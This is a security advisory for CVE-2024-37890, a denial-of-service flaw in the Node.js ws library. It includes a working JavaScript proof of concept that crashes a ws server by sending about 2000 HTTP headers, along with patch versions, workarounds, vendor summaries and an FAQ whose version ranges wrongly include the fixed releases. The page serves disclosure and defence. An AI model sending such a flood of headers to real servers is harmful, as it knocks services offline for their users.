CVE-2024-37890: Denial of service when handling a request with many HTTP headers in ws
Impact
A request with a number of headers exceeding the [server.maxHeadersCount][] threshold could be used to crash a ws server.
Proof of concept
```js
const http = require('http');
const WebSocket = require('ws');

const wss = new WebSocket.Server({ port: 0 }, function () {
  const chars = "!#$%&'+-.0123456789abcdefghijklmnopqrstuvwxyz^|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: wss.address().port
  });

  request.end();
});
```
Patches
The vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e).
Workarounds
In vulnerable versions of ws, the issue can be mitigated in the following ways:
1. Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.
2. Set server.maxHeadersCount to 0 so that no limit is applied.
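A quick way to check whether workaround 1 actually makes the count limit unreachable, added here as an illustration and not taken from ws or Node.js: it sizes the header byte budget enforced by --max-http-header-size / maxHeaderSize against server.maxHeadersCount, and measures the header bytes of the proof of concept above. The 4-byte minimal header line is an assumption used as a conservative lower bound.

```javascript
// Added example, not ws project code: sizing the two Node.js limits behind
// workaround 1. More than server.maxHeadersCount header lines can only arrive
// if they fit in the byte budget set by --max-http-header-size / maxHeaderSize,
// so that budget can be made small enough that the count limit is unreachable.
// Smallest header line the parser accepts: one-character name, colon, empty
// value, CRLF ("a:\r\n"). Assumed lower bound; the request line also consumes
// budget, so this overestimates how many headers fit (the safe direction).
const MIN_HEADER_LINE_BYTES = 4;

// Upper bound on header lines that fit in maxHeaderSize bytes.
function maxHeaderLinesWithin(maxHeaderSize) {
  return Math.floor(maxHeaderSize / MIN_HEADER_LINE_BYTES);
}

// True when a client could exceed maxHeadersCount within the byte limit;
// maxHeadersCount === 0 disables the count limit entirely (workaround 2).
function countLimitReachable(maxHeaderSize, maxHeadersCount) {
  if (maxHeadersCount === 0) return false;
  return maxHeaderLinesWithin(maxHeaderSize) > maxHeadersCount;
}

// Largest byte limit at which the count limit can never be exceeded.
function safeMaxHeaderSize(maxHeadersCount) {
  return maxHeadersCount * MIN_HEADER_LINE_BYTES;
}

// Bytes Node's http client emits for a headers object ("name: value\r\n" each).
function headerBlockBytes(headers) {
  let total = 0;
  for (const [name, value] of Object.entries(headers)) {
    total += Buffer.byteLength(`${name}: ${value}\r\n`);
  }
  return total;
}

// Rebuild the proof-of-concept header set: n distinct two-character names with
// value 'x', plus the four WebSocket upgrade headers.
function pocHeaders(n = 2000) {
  const chars = "!#$%&'+-.0123456789abcdefghijklmnopqrstuvwxyz^|~".split('');
  const headers = {};
  let count = 0;
  outer: for (const a of chars) {
    for (const b of chars) {
      headers[a + b] = 'x';
      if (++count === n) break outer;
    }
  }
  Object.assign(headers, { Connection: 'Upgrade', Upgrade: 'websocket',
    'Sec-WebSocket-Key': 'dGhlIHNhbXBsZSBub25jZQ==', 'Sec-WebSocket-Version': '13' });
  return headers;
}
```

With the 16 KiB default documented for --max-http-header-size, up to 4096 minimal header lines fit, so the default count limit of 2000 is reachable; the proof of concept's 2004 header lines total 14113 bytes and fit comfortably, while a budget of 8000 bytes would reject them.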
Credits
The vulnerability was reported by Ryan LaPointe in https://github.com/websockets/ws/issues/2230.
References
- https://github.com/websockets/ws/issues/2230
- https://github.com/websockets/ws/pull/2231
[--max-http-header-size=size]: https://nodejs.org/api/cli.html#--max-http-header-sizesize
[maxHeaderSize]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener
[server.maxHeadersCount]: https://nodejs.org/api/http.html#servermaxheaderscount
Other sources
Denial of service when handling a request with many HTTP headers in ws
— Microsoft
Node.js ws module is vulnerable to a denial of service, caused by a NULL pointer dereference. By sending a specially crafted request with multiple HTTP headers, a remote attacker could exploit this vulnerability to cause the server to crash.
— IBM
ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.
- https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f
- https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e
- https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c
- https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63
- https://github.com/websockets/ws/issues/2230
- https://github.com/websockets/ws/pull/2231
- https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q
- https://nodejs.org/api/http.html#servermaxheaderscount
— Red Hat
ws is an open source WebSocket client and server for Node.js. A request with a number of headers exceeding the server.maxHeadersCount threshold could be used to crash a ws server. The vulnerability was fixed in ws@8.17.1 (e55e510) and backported to ws@7.5.10 (22c2876), ws@6.2.3 (eeb76d3), and ws@5.2.4 (4abd8f6). In vulnerable versions of ws, the issue can be mitigated in the following ways: 1. Reduce the maximum allowed length of the request headers using the --max-http-header-size=size and/or the maxHeaderSize options so that no more headers than the server.maxHeadersCount limit can be sent. 2. Set server.maxHeadersCount to 0 so that no limit is applied.
— NVD
Frequently Asked Questions
What is the severity of CVE-2024-37890?
CVE-2024-37890 has a high severity rating due to its potential to crash WebSocket servers.
How do I fix CVE-2024-37890?
To fix CVE-2024-37890, upgrade to ws version 8.17.1, 7.5.10, 6.2.3, or 5.2.4.
Which versions are affected by CVE-2024-37890?
CVE-2024-37890 affects ws versions from 8.0.0 to 8.17.1, 7.0.0 to 7.5.10, 6.0.0 to 6.2.3, and 2.1.0 to 5.2.4.
Can CVE-2024-37890 be exploited remotely?
Yes, CVE-2024-37890 can be exploited remotely by sending a specially crafted request to a vulnerable WebSocket server.
What systems are impacted by CVE-2024-37890?
CVE-2024-37890 impacts systems running the ws package in versions prior to the specified fixes.